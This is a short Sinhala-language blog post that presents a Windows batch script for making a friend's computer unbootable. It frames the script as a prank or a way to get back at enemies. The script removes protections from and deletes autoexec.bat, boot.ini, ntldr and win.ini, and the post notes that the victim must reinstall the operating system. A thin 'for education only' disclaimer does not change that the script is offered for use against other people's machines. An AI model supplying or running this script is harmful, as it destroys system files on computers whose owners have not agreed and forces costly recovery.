යාළුවගේ පරිගණකය සදහටම නිදි කරවමු

http://www.israellycool.com/wordpress/wp-content/uploads/dead-computer.jpg

ඔන්න තරහ කාරයන්ට ගේමක් දෙන්න පුළුවන් බාන්ඩයක් අරගෙන අරදත් බ්ලොග් එක ලියන්න ආවෝ, කෝ ඉතින් මට ගානක්වත් නැහැනේ :D මුලින්ම කියන්න ඕනේ මේවා කොටින්ම අද්‍යාපනය සදහා පමණයි , හැබැයි පුතෝ ඔයාගේ පරිගණකයේ නම් කරන්න හිතන්නවත් එපා, මේක ක්ලික් කලොත් ඔයාගේ boot.ini ෆයිල් එකයි තව වැදගත් ගොඩක් ඒවා delete වෙයි. එක නිසා යාළුවගේ උත්සහා කලත් ඔයාගෙනම් කරන්න හිතන්නවත් එපා.. එහෙනම් පහලින් මම දෙන්න ගහන්න ඕනේ code එක. මේකත් කලින් ඒවා වගේම file name එකේ අගිස්සට .Bat කියලා Save කරන්න, නිකන් හරි ටෙස්ට් කරනවානම් virtual box එකක ටෙස්ට් කරන්න.




@echo off
attrib -r -s -h c:\autoexec.bat
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini       

එහෙනම් මෙන්න කිවුවා මේ සියල්ල අද්‍යාපනය සදහා පමණයි. මේක කලොත් පරිගණකය ගොඩ ගන්න අයෙත් පාරක් Linux හරි Windows හරි දාන්න වෙයි

අපිට Like එකක් දාලා Follow කරන්න අමතක කරන්න එපා.

Related Posts:

Disqus Comments
© 2017 Web Sinhalen - Template Created by Harindu Jayakody - Proudly powered by Blogger